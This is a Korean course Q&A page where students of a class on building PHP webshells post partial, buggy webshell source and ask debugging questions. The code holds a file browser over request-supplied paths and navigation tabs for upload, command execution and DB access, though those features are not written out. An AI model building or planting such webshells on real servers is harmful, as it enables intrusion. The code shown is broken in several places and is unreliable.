이 소스로 실행 해보면 Name,Type,Date,Action 부분 태이블에 아무것도 안 떠요 __________소스___________ <? header("Content-Type: text/html; charset=UTF-8"); $mode = $_REQUEST["mode"]; $path = $_REQUEST["path"]; $page = basename($_SERVER["PHP_SELF"]); if(empty($path)){ $tempFileName = basename(__FILE__); $tempPath = realpath(__FILE__); $path = str_replace($tempFileName, "", $tempPath); $path = str_replace("\\", "/", $path); } else { $path = realpath($path)."/"; $path = str_replace("\\", "/", $path); } # Dir list retuurn function function getDirList($getPath) { $listArr = array(); $handler = opendir($getPath); while($file = readdir($handler)) { if(is_dir($getPath.$file) == "1") { $listArr[] = $file; } } closedir($handler); return $listArr; } #File List return function function getFileList($getPath) { $listArr = array(); $handler = opendir($getPath); while($file = readdir($handler)) { if(is_dir($getPath.$file) != "1") { $listArr[] = $file; } } closedir($handler); return $listArr; } ?> <!DOCTYPE html> <html lang="ko"> <head> <title>Space_Pig; webshell</title> <!-- 합쳐지고 최소화된 최신 CSS --> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap.min.css"> <!-- 부가적인 테마 --> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap-theme.min.css"> <!-- 합쳐지고 최소화된 최신 자바스크립트 --> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/js/bootstrap.min.js"></script> </head> <body> <div class="container-fluid"> <div class="row"> <div class="col-md-3"></div> <div class="col-md-6"> <h3>Webshell <small>Create by space_pig;</small></h3> <hr> <ul class="nav nav-tabs"> <li role="presentation" <?if(empty($mode) || $mode == "fileBrowser") echo "class=\"active\"";?>><a href="<?=$page?>?mode=fileBrowser">File Browser</a></li> <li role="presentation" <?if($mode == "fileUpload") echo "class=\"active\"";?>><a href="<?=$page?>?mode=fileupload">File upload</a></li> <li role="presentation" <?if($mode == "command") echo "class=\"active\"";?>><a href="<?=$page?>?mode=command">Command Execustion</a></li> <li role="presentation" <?if($mode == "db") echo "class=\"active\"";?>><a href="<?=$page?>?mode=db">DB connector</a></li> <li role="presentation"><a href="<?=$page?>?mode=logout">Logout</a></li> </ul> <br> <? if(empty($mode) || $mode == "fileBrowser") { ?> <form action="<?=$page?>?mode=fileBrowser" metho="GET"> <div class="input-group"> <span class="input-group-addon">Current Path</span> <input type="text" class="form-control" placeholder="Path Input..." name="path" value="<?=$path?>"> <span class="input-group-btn"> <button class="btn btn-default" type="submit">Move</button> </span> </div> </form> <hr> <div class="table-responsive"> <table class="table table-bordered table-hover"style="table-layout: fixed; word-break: break-all;"> <thead> <tr class="active"> <th style="width: 50%" class="text-center">Name</th> <th style="width: 14%" class="text-center">Type</th> <th style="width: 18%" class="text-center">Date</th> <th style="width: 18%" class="text-center">Action</th> </tr> </thead> <tbody> <? $dirList = getDirList($path); for($i=0; $i<count($dirList); $i++) { if($dirList[$i] != ".") { $dirDate = date("Y-m-d H:i", filetime($path.$dirList[$i])) ?> <tr> <td style="vertical-align: middle"><span class="glyphicon glyphicon-folder-open" aria-hidden="true"></span>%nbsp;%nbsp;<?=$dirList[$i]?></td> <td style="vertical-align: middle" class="text-center"><kbd>Directory</kbd></td> <td style="vertical-align: middle" class="text-center"><?=$dirDate?></td> <td style="vertical-align: middle" class="text-center"> <? if($dirList[$i] != "..") { ?> <div class="btn-group btn-group-sm" role="group" aria-label=""> <button type="button" class="btn btn-danger" title="File Delete"><span class="glyphicon glyphicon-trash" aria-hidden="true"></span></button> </div> <? } ?> </td> </tr> <? } } ?> <? $fileList = getFileList($path); for($i=0; $i<count($fileList); $i++); { $fileDate = date("Y-m-d H:i", filemtime($path.$dirList[$i])); ?> <tr> <td style="vertical-align: middle"><span class="glyphicon glyphicon-file" aria-hidden="true"></span> <?=$fileList[$i]?></td> <td style="vertical-align: middle" class="text-center"><kbd>File</kbd></td> <td style="vertical-align: middle" class="text-center"><?=$fileDate?></td> <td style="vertical-align: middle" class="text-center"> <div class="btn-group btn-group-sm" role="group" aria-label=""> <button type="button" class="btn btn-info" title="File Download"><span class="glyphicon glyphicon-save" aria-hidden="true"></span></button> <button type="button" class="btn btn-warning" title="File Modify"><span class="glyphicon glyphicon-wrench" aria-hidden="true"></span></button> <button type="button" class="btn btn-danger" title="File Delete"><span class="glyphicon glyphicon-trash" aria-hidden="true"></span></button> </div> </td> </tr> <? } ?> </tbody> </table> </div> <? }?> <hr> <p class="text-muted text-center">Copyrightⓒ 2021, Space_pig, ALL rights reserved.</p> </div> <div class="col-md-3"></div> </div> </div> </body> </html>
- 미해결Skill-Up! 배워서 바로 쓰는 웹쉘 제작
500 error
$page = basename($_SERVER["PHP_SELF"]); 입력, 저장 후 페이지 열면 500 에러가 뜨는데 문제가 뭘까요? ㅜ 좋은 강의 감사합니다. ^^ (코드는 전부 오타없이 적혀있습니다.) <? header("Content-Type: text/html; charset=UTF-8"); $mode = $_REQUEST["mode"] $page = basename($_SERVER["PHP_SELF"]); ?> <!DOCTYPE html> <html lang="ko"> <head> <title>Crehacktive Webshell</title> <!-- 합쳐지고 최소화된 최신 CSS --> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap.min.css"> <!-- 부가적인 테마 --> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap-theme.min.css"> <!-- 합쳐지고 최소화된 최신 자바스크립트 --> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/js/bootstrap.min.js"></script> </head> <body> <div class="container-fluid"> <div class="row"> <div class="col-md-3"></div> <div class="col-md-6"> <h3>Webshell <small>Created by Crehacktive</small></h3> <hr> <ul class="nav nav-tabs"> <li role="presentation" <?if(empty($mode)||$mode=="fileBrowser") echo "class=\"active\"";?>><a href="<?=$page?>?mode=fileBrowser">File Browser</a></li> <li role="presentation"><?if($mode=="fileUpload") echo "class=\"active\"";?>><a href="<?=$page?>?mode=fileUpload">File Upload</a></li> <li role="presentation"><?if($mode=="command") echo "class=\"active\"";?>><a href="<?=$page?>?mode=command">Command Execution</a></li> <li role="presentation"><?if($mode=="db") echo "class=\"active\"";?>><a href="<?=$page?>?mode=db">DB Connector</a></li> <li role="presentation"><a href="<?=$page?>?mode=logout">Logout</a></li> </ul> <hr> <p class="text-muted text-center">Copyrightⓒ 2021,Crehacktive,All rights reserved</p> </div> <div class="col-md-3"></div> </div> </div> </body> </html>
- 미해결Skill-Up! 배워서 바로 쓰는 웹쉘 제작
질문있습니다~
fileModify 를 할 때 내용이 있는 파일은 잘 읽히는데 파일에 내용이 없는 파일은 위에 경로 부분 포함 textarea 자체가 나오지 않는데 이유를 알 수 있을까요?
- 미해결Skill-Up! 배워서 바로 쓰는 웹쉘 제작
좋은 강의 감사합니다~
글쓰는 곳이 여기뿐이 안보이네요...ㅎ 좋은 강의 감사합니다~~~ 👍👍👍👍